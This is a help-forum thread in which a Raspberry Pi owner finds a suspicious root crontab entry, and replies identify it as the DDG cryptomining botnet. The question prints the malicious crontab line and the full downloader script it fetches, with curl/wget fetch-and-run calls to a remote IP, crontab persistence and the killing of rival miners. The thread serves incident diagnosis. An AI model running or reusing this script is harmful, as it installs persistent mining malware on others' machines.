Suspicious crontab entry


I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.



Crontab entry:



*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh


The contents of http://103.219.112.66:8000/i.sh are:



export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -


My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.



What is this? What should I do?










Tags: security cron malware

asked 8 hours ago by Peter Dam




  • It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.
    – Wildcard, 7 hours ago

  • Is your Raspberry Pi open to the internet? What is your Raspberry Pi running? This is the only result on Google when I search for xribfa4. If you are not running software that needs to do this then this is likely a virus.
    – kemotep, 7 hours ago

  • @kemotep that string is random, but Google for the IP and it gives a few results. Something about a DDG mining botnet.
    – frostschutz, 6 hours ago

  • I found it. It's crazy that the IP is registered to an Indonesian Government site. Also looks like there are nearly 2000 other IPs delivering this payload.
    – kemotep, 6 hours ago

  • The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.
    – Hans-Martin Mosner, 4 hours ago











1 Answer
It is a DDG mining botnet. How it works:

  1. exploiting an RCE vulnerability

  2. modifying the crontab

  3. downloading the appropriate mining program (written in Go)

  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers

U&L: How can I kill minerd malware on an AWS EC2 instance? (compromised server)






answered 6 hours ago, edited 6 hours ago, by GAD3R










  • Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.
    – Peter Dam, 3 hours ago










